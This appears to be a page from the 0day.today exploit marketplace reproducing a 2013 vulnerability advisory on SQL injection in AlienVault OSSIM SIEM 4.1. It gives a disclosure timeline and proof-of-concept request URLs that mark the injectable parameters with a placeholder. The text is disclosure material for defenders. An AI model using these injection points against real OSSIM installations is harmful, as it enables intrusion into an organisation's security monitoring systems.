0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Alienvault OSSIM SIEM 4.1 SQL Injection Vulnerability
# Title: Alienvault OSSIM Open Source SIEM 4.1 Multiple SQL Vulnerabilities # Date: February 15, 2013 # Author: Glafkos Charalambous # Vendor: AlienVault # Vendor URL: http://www.alienvault.com # Reported: February 17, 2013 Timeline: --------- 17 Feb 2013: Vulnerability Reported to AlienVault 19 Feb 2013: Sales Department replied if interested to migrate from OSSIM to AlienVault 19 Feb 2013: Asked if there is someone that can handle the security issues 22 Feb 2013: No Vendor response 22 Jun 2013: Public Disclosure Vendor Description: ------------------- OSSIM is the most widely used SIEM offering, thanks in no small part to the open source community that has promoted its use. OSSIM provides all of the capabilities that a security professional needs from a SIEM offering, event collection, normalization, correlation and incident response - but it also does far more. Not simply satisfied with integrating data from existing security tools, OSSIM is built on the Unified Security Management platform which provides a common framework for the deployment, configuration, and management of your security tools. Vulnerability Details: ---------------------- Blind SQL Injection vulnerabilities detected in the Alienvault OSSIM Open Source SIEM 4.1 product: Example POC: Get Parameter: sensor https://[host]/ossim/forensics/base_qry_main.php?new=1&num_result_rows=-1&sensor=SQL_INJECTION&submit=Query Get Parameter: tcp_flags https://[host]/ossim/forensics/base_stat_alerts.php?ossim/forensics/base_stat_alerts.php?current_view=-1 &layer4=TCP&num_result_rows=-1&sort_order=occur_d&tcp_flags[0]=SQL_INJECTION&tcp_port[0][0]= &tcp_port[0][1]=layer4_sport&tcp_port[0][2]==&tcp_port[0][3]=16315 &tcp_port[0][4]= &tcp_port[0][5]= &tcp_port_cnt=1 Get Parameter: tcp_port https://[host]/ossim/forensics/base_stat_alerts.php?current_view=-1&layer4=TCP&num_result_rows=-1&sort_order=occur_d &tcp_flags[0]=&tcp_port[0][0]= &tcp_port[0][1]=layer4_sport&tcp_port[0][2]==&tcp_port[0][3]=16315 &tcp_port[0][4]=SQL_INJECTION&tcp_port[0][5]= &tcp_port_cnt=1 GetParameter: ip_addr https://[host]/ossim/forensics/base_stat_ports.php?ip_addr[0][0]= &ip_addr[0][1]=ip_src&ip_addr[0][2]== &ip_addr[0][3]=192.168.0.11&ip_addr[0][8]= &ip_addr[0][9]=AND&ip_addr[1][0]= &ip_addr[1][1]=ip_dst&ip_addr[1][2]== &ip_addr[1][3]=0.0.0.0&ip_addr[1][8]=SQL_INJECTION&ip_addr[1][9]= &ip_addr_cnt=2&port_type=2&proto=6 Get Parameter: port_type https://[host]/ossim/forensics/base_stat_ports.php?ip_addr[0][0]= &ip_addr[0][1]=ip_src&ip_addr[0][2]== &ip_addr[0][3]=0.0.0.0&ip_addr[0][8]= &ip_addr[0][9]=AND&ip_addr[1][0]= &ip_addr[1][1]=ip_dst&ip_addr[1][2]== &ip_addr[1][3]=0.0.0.0&ip_addr[1][8]= &ip_addr[1][9]= &ip_addr_cnt=2&port_type=SQL_INJECTION&proto=6 SQL Injection vulnerabilities detected in the Alienvault OSSIM Open Source SIEM 4.1 product: Example POC: Get Parameter: sortby https://[host]/ossim/vulnmeter/index.php?allres=1&op=search&rvalue=1&sortby=SQL_INJECTION&submit=Find&type=scantime&withoutmenu=1 Get Parameter: rvalue https://[host]/ossim/vulnmeter/index.php?allres=1&op=search&rvalue=SQL_INJECTION&sortby=&submit=Find&type=scantime&withoutmenu=1 # 0day.today [2024-07-01] #